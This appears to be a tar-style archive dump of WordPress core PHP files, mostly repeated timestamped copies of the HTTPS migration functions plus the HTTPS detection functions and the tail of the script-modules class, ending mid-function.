* If the filter returns no data (an empty array), nothing will be embedded in the page.
*
* The data for a given Script Module, if provided, will be JSON serialized in a script
* tag with an ID of the form `wp-script-module-data-{$module_id}`.
*
* The data can be read on the client with a pattern like this:
*
* Example:
*
* const dataContainer = document.getElementById( 'wp-script-module-data-MyScriptModuleID' );
* let data = {};
* if ( dataContainer ) {
* try {
* data = JSON.parse( dataContainer.textContent );
* } catch {}
* }
* // data.dataForClient === 'ok';
* initMyScriptModuleWithData( data );
*
* @since 6.7.0
*
* @param array $data The data associated with the Script Module.
*/
$data = apply_filters( "script_module_data_{$module_id}", array() );
if ( is_array( $data ) && array() !== $data ) {
/*
* This data will be printed as JSON inside a script tag like this:
* <script type="application/json"></script>
*
* A script tag must be closed by a sequence beginning with `</`. It's impossible to
* close a script tag without using `<`. We ensure that `<` is escaped and `/` can
* remain unescaped, so `</script>` will be printed as `\u003C/script\u00E3`.
*
* - JSON_HEX_TAG: All < and > are converted to \u003C and \u003E.
* - JSON_UNESCAPED_SLASHES: Don't escape /.
*
* If the page will use UTF-8 encoding, it's safe to print unescaped unicode:
*
* - JSON_UNESCAPED_UNICODE: Encode multibyte Unicode characters literally (instead of as `\uXXXX`).
* - JSON_UNESCAPED_LINE_TERMINATORS: The line terminators are kept unescaped when
* JSON_UNESCAPED_UNICODE is supplied. It uses the same behaviour as it was
* before PHP 7.1 without this constant. Available as of PHP 7.1.0.
*
* The JSON specification requires encoding in UTF-8, so if the generated HTML page
* is not encoded in UTF-8 then it's not safe to include those literals. They must
* be escaped to avoid encoding issues.
*
* @see https://www.rfc-editor.org/rfc/rfc8259.html for details on encoding requirements.
* @see https://www.php.net/manual/en/json.constants.php for details on these constants.
* @see https://html.spec.whatwg.org/#script-data-state for details on script tag parsing.
*/
$json_encode_flags = JSON_HEX_TAG | JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_LINE_TERMINATORS;
if ( ! is_utf8_charset() ) {
$json_encode_flags = JSON_HEX_TAG | JSON_UNESCAPED_SLASHES;
}
wp_print_inline_script_tag(
(string) wp_json_encode(
$data,
$json_encode_flags
),
array(
'type' => 'application/json',
'id' => "wp-script-module-data-{$module_id}",
)
);
}
}
}
/**
* @access private This is only intended to be called by the registered actions.
*
* @since 6.7.0
*/
public function print_a11y_script_module_html() {
if ( ! $this->a11y_available ) {
return;
}
echo '<div style="position:absolute;margin:-1px;padding:0;height:1px;width:1px;overflow:hidden;clip-path:inset(50%);border:0;word-wrap:normal !important;">'
. '<p id="a11y-speak-intro-text" class="a11y-speak-intro-text" hidden>' . esc_html__( 'Notifications' ) . '</p>'
. '<div id="a11y-speak-assertive" class="a11y-speak-region" aria-live="assertive" aria-relevant="additions text" aria-atomic="true"></div>'
. '<div id="a11y-speak-polite" class="a11y-speak-region" aria-live="polite" aria-relevant="additions text" aria-atomic="true"></div>'
. '</div>';
}
}
https-migration-20260606102945-20260621081100.php 0000666 00000011205 15224151221 0013346 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
.php-compat.php 0000666 00000000000 15224151221 0007370 0 ustar 00 https-migration-20260606074155-20260621081105-20260621181028.php 0000666 00000011205 15224151221 0014740 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605170751-20260621081103.php 0000666 00000011205 15224151221 0013350 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605120603-20260621081201-20260621135904.php 0000666 00000011205 15224151221 0014724 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260614061720-20260621081211.php 0000666 00000011205 15224151221 0013343 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605091832-20260621081205-20260621132946.php 0000666 00000013341 15224151221 0014736 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260605171925.php 0000666 00000011205 15224151221 0011777 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
